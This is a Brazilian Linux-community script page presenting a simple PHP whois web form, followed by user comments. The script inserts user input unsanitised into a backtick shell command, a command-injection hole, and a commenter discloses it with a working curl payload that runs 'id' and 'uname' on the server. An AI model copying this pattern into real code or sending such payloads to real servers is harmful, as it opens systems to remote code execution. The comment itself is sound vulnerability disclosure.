Whois em PHP

Publicado por Perfil removido (última atualização em 14/11/2012)

[ Hits: 7.887 ]

Download whoisphp.php

0 0
Denuncie   Favoritos   Indicar  



Script simples em PHP para consulta whois.

  



Esconder código-fonte

<?php

/*
 * Scripit PHP para gerar whois 
 * 
 *  code by @Kouback_TR_
 *  http://koubacktr.com/
 *  http://twitter.com/kouback_tr_
 */
  
print"
<title>PHP-Kouback-Whois</title>
<body bgcolor=#000000>
<center><b><font size=6><font color=#FFFFFF>-=Whois=-</font></font></b></center>
<form method='post' action='?action=whois'>
<br>
<b><center><font color=#FFFFFF>Target whois</font></center></b>
<center><input type=text name=target></input></center></pre>
<center><input type=submit value='whois'></input></center>
<br><br><br><br>";

if($_GET['action'] == "whois"){
   
$target = $_POST['target'];
$whois = `whois $target && arp -a`;
print"
<CENTER><TABLE DIR=LTR WIDTH=50% BORDER=1 CELLPADDING=4 CELLSPACING=3><COL WIDTH=256*><TR><TD WIDTH=100% VALIGN=TOP><P><font color=#00FF14 size=2>";
echo nl2br($whois);
print"</P></TD></TR></TABLE></CENTER>";
}

?>

Scripts recomendados

Cria gráficos para monitoramento de consumo de CPU e Memória a partir de arquivos [Atualização].

PHP Script para testar ping de varios enderecoes em arquivo TXT

PortScan em PHP com post usando fsockopen

Script PHP para fazer UPLOAD de arquivos

Babelfish Translator 2.0


  

Comentários
[1] Comentário enviado por fvox em 14/11/2012 - 10:06h

Hi.

Muito cuidado ao usar backticks pois é uma alias para a função shell_exec().
Seu código apresenta uma vulnerabilidade conhecida como RCE (Remote Code Execution).

Exploit:
:~$ curl -s "http://localhost/whois.php?action=whois" --data "target=whois fvox; id;uname -srmo #"
[...]
No whois server is known for this kind of object.<br />
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)<br />
Linux 2.6.xx-xx-generic x86_64 GNU/Linux<br />

[2] Comentário enviado por removido em 14/11/2012 - 19:27h

Obrigado amigo pela dica, e parabéns pela otima visão da falha, a internet precisa de mais gente como vc


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

File Browser: Crie sua Nuvem Pessoal Privada

A produção de áudio e vídeo no Linux e as distribuições dedicadas a esse fim

Criptografando sua Home com Gocryptfs para tristeza do meliante

A Involução do Linux e as Lambanças Desnecessárias desde o seu Lançamento

O Journal no Linux para a guarda e consulta de logs do sistema

Dicas

Usando alias no Terminal para comandos longos

Simplificando o manual do terminal no Ubuntu 26.04

Bloqueio da instalação e reinstalação do Snap (snapd) no Ubuntu

Cursor do mouse gigante no KDE Plasma

Integração do Flatpak e Flathub no Kubuntu (KDE Discover)

Tópicos

Continuando meus tópicos anteriores (11)

GLPI Cards de filtros de pesquisa (2)

Executar um programa em Rust (3)

Dual boot. (14)

Mover /home para outro HD (2)

Top 10 do mês

Scripts

[Shell Script] atualizar_kernel.sh

[Shell Script] Flatctl

[Shell Script] yad-clamav

[Shell Script] imageDownloader

[Shell Script] Flatpak manager

A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

Site hospedado por: